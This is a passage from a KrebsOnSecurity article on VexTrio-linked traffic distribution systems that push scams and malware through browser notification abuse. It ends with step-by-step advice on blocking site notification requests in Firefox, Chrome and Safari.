But Burton argues that this view is myopic, and helps perpetuate a dark adtech industry that also pushes plenty of straight-up malware, noting that hundreds of thousands of compromised websites around the world every year redirect victims to the tangled web of VexTrio and VexTrio-affiliate TDSs.

“These TDSs are a nefarious threat, because they’re the ones you can connect to the delivery of things like information stealers and scams that cost consumers billions of dollars a year,” Burton said. “From a larger strategic perspective, my takeaway is that Russian organized crime has control of malicious adtech, and these are just some of the many groups involved.”

WHAT CAN YOU DO?

As KrebsOnSecurity warned way back in 2020, it’s a good idea to be very sparing in approving notifications when browsing the Web. In many cases these notifications are benign, but as we’ve seen there are numerous dodgy firms that are paying site owners to install their notification scripts, and then reselling that communications pathway to scammers and online hucksters.

If you’d like to prevent sites from ever presenting notification requests, all of the major browser makers let you do this — either across the board or on a per-website basis. While it is true that blocking notifications entirely can break the functionality of some websites, doing this for any devices you manage on behalf of your less tech-savvy friends or family members might end up saving everyone a lot of headache down the road.

To modify site notification settings in Mozilla Firefox, navigate to Settings, Privacy & Security, Permissions, and click the “Settings” tab next to “Notifications.” That page will display any notifications already permitted and allow you to edit or delete any entries. Tick the box next to “Block new requests asking to allow notifications” to stop them altogether.

In Google Chrome, click the icon with the three dots to the right of the address bar, scroll all the way down to Settings, Privacy and Security, Site Settings, and Notifications. Select the “Don’t allow sites to send notifications” button if you want to banish notification requests forever.

In Apple’s Safari browser, go to Settings, Websites, and click on Notifications in the sidebar. Uncheck the option to “allow websites to ask for permission to send notifications” if you wish to turn off notification requests entirely.